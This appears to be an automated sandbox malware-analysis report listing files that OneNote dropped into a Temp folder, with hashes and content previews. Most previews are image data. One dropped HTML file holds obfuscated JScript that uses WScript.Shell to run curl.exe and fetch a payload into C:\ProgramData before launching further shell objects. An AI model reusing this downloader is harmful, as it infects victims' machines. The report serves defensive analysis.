                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1657
                                                                                                                                            Entropy (8bit):7.80882577056055
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                            MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                            SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                            SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                            SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{4C5466CD-6BF4-4FB3-A58A-9E0AAF181E66}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16003
                                                                                                                                            Entropy (8bit):7.959532793770661
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                            MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                            SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                            SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                            SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{4C8F762E-A627-4EEC-9AEE-3370845DE471}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13084
                                                                                                                                            Entropy (8bit):7.940058639272698
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                            MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                            SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                            SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                            SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{4D4E019E-D23E-4213-947C-7DBC1C4A1985}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 50 x 600, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4410
                                                                                                                                            Entropy (8bit):7.857636973514526
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
                                                                                                                                            MD5:2494381A1ACDC83843B912CFCDE5643B
                                                                                                                                            SHA1:98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
                                                                                                                                            SHA-256:5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
                                                                                                                                            SHA-512:0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}|..{'.U..~......}....s.............,CVu.x.:C..5...;.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{4E13ABD6-7B2E-48DE-91CB-E7A846A5526A}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5386
                                                                                                                                            Entropy (8bit):7.943706538857394
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                            MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                            SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                            SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                            SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{4F17502F-AD5D-4A84-8C03-1117980504B0}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13084
                                                                                                                                            Entropy (8bit):7.940058639272698
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                            MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                            SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                            SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                            SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{4FCEE401-15C0-4C9C-9BE2-45D8FF3496BD}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 171 x 552, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10056
                                                                                                                                            Entropy (8bit):7.956064700093514
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
                                                                                                                                            MD5:E1B57A8851177DD25DC05B50B904656A
                                                                                                                                            SHA1:96D2E31A325322F2720722973814D2CAED23D546
                                                                                                                                            SHA-256:2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
                                                                                                                                            SHA-512:BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{4FCEE6FF-2D6C-4335-8DA4-FAE1E046AE0E}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13737
                                                                                                                                            Entropy (8bit):7.916899917415529
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                            MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                            SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                            SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                            SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{51446822-5A11-40EC-B973-E40BCBD9EA8B}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4847
                                                                                                                                            Entropy (8bit):7.950192613458318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                            MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                            SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                            SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                            SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{514BC3EE-2650-4864-AAE9-234CE07C94FC}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27862
                                                                                                                                            Entropy (8bit):7.238903610770013
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                                                            MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                                                            SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                                                            SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                                                            SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{519A1DBC-0984-430D-B0DF-CEEBAD38D621}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24268
                                                                                                                                            Entropy (8bit):6.946124661664625
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                                                            MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                                                            SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                                                            SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                                                            SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{52354602-58E9-4281-BD90-6A0BCC7E2CC9}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7374
                                                                                                                                            Entropy (8bit):7.955141875077912
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                            MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                            SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                            SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                            SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{523D1B41-BF52-405B-A016-5C5124CD2609}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (1260), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2071
                                                                                                                                            Entropy (8bit):4.6535465810065695
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:5C9/KCeWPfdZ4WPe+G+7LrMjFA45MIostil:c9i0dZ4J+57GA45XowM
                                                                                                                                            MD5:C9D2355FC2BE90B0FA73ECB67061A77E
                                                                                                                                            SHA1:5A7792A9B3677FDC6596B09C7AFF117DDF15BD28
                                                                                                                                            SHA-256:4F069F918EDC3919F59CD0608574BC214D6020E81F2603F0E3B3BAD6E0F9939E
                                                                                                                                            SHA-512:9011308DB60773AC6F33462FEAC996DF17F34E1A9322BE2306C11674CB53D81D5492BE5DE7FAAC700344F1DCD8763A3B2876E064318E46F5186671352FC3B734
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<html>....<div id="content">f5&u5&n5&c5&t5&i5&o5&n5& 5&s5&l5&e5&e5&p5&(5&m5&i5&l5&l5&i5&s5&)5&{5&v5&a5&r5& 5&d5&a5&t5&e5& 5&=5& 5&n5&e5&w5& 5&D5&a5&t5&e5&(5&)5&;5&v5&a5&r5& 5&c5&u5&r5&D5&a5&t5&e5& 5&=5& 5&n5&u5&l5&l5&;5&d5&o5& 5&{5& 5&c5&u5&r5&D5&a5&t5&e5& 5&=5& 5&n5&e5&w5& 5&D5&a5&t5&e5&(5&)5&;5& 5&}5&w5&h5&i5&l5&e5&(5&c5&u5&r5&D5&a5&t5&e5& 5&-5& 5&d5&a5&t5&e5& 5&<5& 5&m5&i5&l5&l5&i5&s5&)5&;5&}5&/5&*5&*5& 5&v5&a5&r5& 5&u5&r5&l5& 5&=5& 5&"5&h5&t5&t5&p5&s5&:5&/5&/5&g5&o5&o5&g5&l5&e5&.5&c5&o5&m5&"5&;5& 5&*5&/5&n5&e5&w5& 5&A5&c5&t5&i5&v5&e5&X5&O5&b5&j5&e5&c5&t5&(5&"5&w5&s5&c5&r5&i5&p5&t5&.5&s5&h5&e5&l5&l5&"5&)5&.5&r5&u5&n5&(5&"5&c5&u5&r5&l5&.5&e5&x5&e5& 5&-5&-5&o5&u5&t5&p5&u5&t5& 5&C5&:5&\5&\5&P5&r5&o5&g5&r5&a5&m5&D5&a5&t5&a5&\5&\5&i5&n5&d5&e5&x5&15&.5&p5&n5&g5& 5&-5&-5&u5&r5&l5& 5&"5& 5&+5& 5&u5&r5&l5&,5& 5&05&)5&;5&s5&l5&e5&e5&p5&(5&15&55&05&05&05&)5&;5&v5&a5&r5& 5&s5&h5&e5&l5&l5& 5&=5& 5&n5&e5&w5& 5&A5&c5&t5&i5&v5&e5&X5&O5&b5&j5&e5&c5&t5&(5&"5&s5&h5&e5&l5&l5&.5&a5&p5&p5&l5&i5&c5&a5&t5&

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{53145A6C-47C9-401B-AFFC-F6FA5179B0F4}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11449
                                                                                                                                            Entropy (8bit):7.91552812501629
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                            MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                            SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                            SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
